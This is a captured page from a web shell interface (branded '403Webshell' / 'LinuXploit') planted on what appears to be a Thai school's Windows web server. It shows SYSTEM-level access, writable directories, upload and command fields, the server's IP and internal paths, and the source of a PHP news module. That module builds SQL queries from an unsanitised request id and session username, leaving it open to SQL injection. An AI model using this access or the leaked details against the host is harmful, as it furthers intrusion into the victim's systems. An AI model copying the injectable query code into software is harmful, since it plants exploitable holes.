403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/sophon/modules/tkk9/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/myschool/sophon/modules/tkk9/readtkk9_3.php
<link href="style.css" rel="stylesheet" type="text/css">
<script language="JavaScript1.2">
<!--
window.moveTo(0,0);
if (document.all) {
top.window.resizeTo(screen.availWidth,screen.availHeight);
}
else if (document.layers||document.getElementById) {
if (top.window.outerHeight<screen.availHeight||top.window.outerWidth<screen.availWidth){
top.window.outerHeight = screen.availHeight;
top.window.outerWidth = screen.availWidth;
}
}
//-->
</script>
<script type="text/javascript">
function showemotion() {
	emotion1.style.display = 'none';
	emotion2.style.display = '';
}
function closeemotion() {
	emotion1.style.display = '';
	emotion2.style.display = 'none';
}

function emoticon(theSmilie) {

	document.form2.COMMENT.value += ' ' + theSmilie + ' ';
	document.form2.COMMENT.focus();
}
</script>
<?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);

//แสดงข่าวสาร/ประชาสัมพันธ์
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[tkk9] = $db->select_query("SELECT * FROM ".TB_TKK9." WHERE id='".$_GET[id]."' ");
$arr[tkk9] = $db->fetch($res[tkk9]);
$db->closedb ();
		?>

	<TABLE align=center cellSpacing=0 cellPadding=0 width=850 border=0  >
        <TR>
			<TD  align="right" >
				<A HREF="?name=tkk9&file=bookperson&category=<?=$arr[user][id];?>"><img src="images/exit4.png"></A>
				<input type="image"  src="images/exit5.png"onClick="javascript:window.close();" >
&nbsp;  
       </TD>
  </TR>
	   <TR>
          <TD >
<?
$_GET['id'] = intval($_GET['id']);
//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
//แสดงข่าวสาร/ประชาสัมพันธ์
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$res[tkk9] = $db->select_query("SELECT * FROM ".TB_TKK9." WHERE id='".$_GET[id]."' ");
$arr[tkk9] = $db->fetch($res[tkk9]);
$db->closedb ();
if(!$arr[tkk9][id]){
	echo "<BR><BR><BR><BR><CENTER><IMG SRC=\"images/icon/notview.gif\" BORDER=\"0\" ><BR><BR><B>ไม่มีเรื่อง</B></CENTER><BR><BR><BR><BR>";
}else{
$Filetkk9Topic = "data/tkk9text/".$arr[tkk9][post_date].".txt";
	$file_open = @fopen($Filetkk9Topic, "r");
	$content = @fread ($file_open, @filesize($Filetkk9Topic));
	$Detail = stripslashes(FixQuotes($content));
	//ทำการเพิ่มจำนวนคนเข้าชม
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$q[Pageview] = "UPDATE ".TB_TKK9." SET pageview = pageview+1 WHERE id = '".$_GET[id]."' ";
	$sql[Pageview] = mysql_query ( $q[Pageview] ) or sql_error ( "db-query",mysql_error() );
	
	$db->closedb ();
?>
		<table align="center" width="850"  bgcolor=#FFFF00 border="0" cellspacing="0" cellpadding="0">
		<TABLE align="center" width="853"   background="images/124.jpg"  border="0" cellspacing="0" cellpadding="0">
		<tr>
		<td valign="top">
		<B><FONT COLOR="#000066">เรื่อง : <?=$arr[tkk9][topic];?> (<?=$arr[tkk9][pageview];?>)</B>
		</td>
		</tr>
		<tr>
		<td><?=$Detail;?></td>
		</tr>
		</table>
<table align="center" width="850" bgcolor=#FFFF00  border="0" cellspacing="2" cellpadding="1">
	<tr>
	<td width="600" align="center" bgcolor=#99FFFF colspan="5"><b>รายการ</td>
    <td width="100" align="center"  bgcolor=#99FFFF align="center">ดาวน์โหลด</B></td>
	</tr>
	<tr>
	<td width="600" bgcolor=#C1FFC1 colspan="5">
<?
					 if($arr[tkk9][full_text]){ 	  
?>
<b><img src="images/attach.gif"> เอกสารแนบฉบับที่ 1</b>
</td>
<td width="100" bgcolor=#C1FFC1 align="center">
<a href="data/tkk9/<?=$arr[tkk9][full_text];?>" target="_blank"><b><img src="images/yfile.png"></b></A>
<? } else {
echo "";
}?>
</td>
	</tr>
	<tr>
	<td width="600" bgcolor=#C1FFC1 colspan="5">
<?
					 if($arr[tkk9][full_texts]){ 	  
?>
<b><img src="images/attach.gif"> เอกสารแนบฉบับที่ 2</b>
</td>
<td width="100" bgcolor=#C1FFC1 align="center">
<a href="data/tkk9/<?=$arr[tkk9][full_texts];?>" target="_blank"><b><img src="images/yfile.png"></b></A>
<? } else {
echo "";
}?>
</td>
	</tr>
	<tr>
	<td width="600" bgcolor=#C1FFC1 colspan="5">
<?
					 if($arr[tkk9][full_textu]){ 	  
?>
<b><img src="images/attach.gif"> เอกสารแนบฉบับที่ 3</b>
</td>
<td width="100" bgcolor=#C1FFC1 align="center">
<a href="data/tkk9/<?=$arr[tkk9][full_textu];?>" target="_blank"><b><img src="images/yfile.png"></b></A>
<? } else {
echo "";
}?>
</td>
	</tr>
<tr>
	<td width="600" bgcolor=#C1FFC1 colspan="5">
<?
					 if($arr[tkk9][full_texto]){ 	  
?>
<b><img src="images/attach.gif"> เอกสารแนบฉบับที่ 2</b>
</td>
<td width="100" bgcolor=#C1FFC1 align="center">
<a href="data/tkk9/<?=$arr[tkk9][full_texto];?>" target="_blank"><b><img src="images/yfile.png"></b></A>
<? } else {
echo "";
}?>
</td>
	</tr>
	<tr>	
	</table>
	<? }?>		
			<!-- End tkk9 -->	
	
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit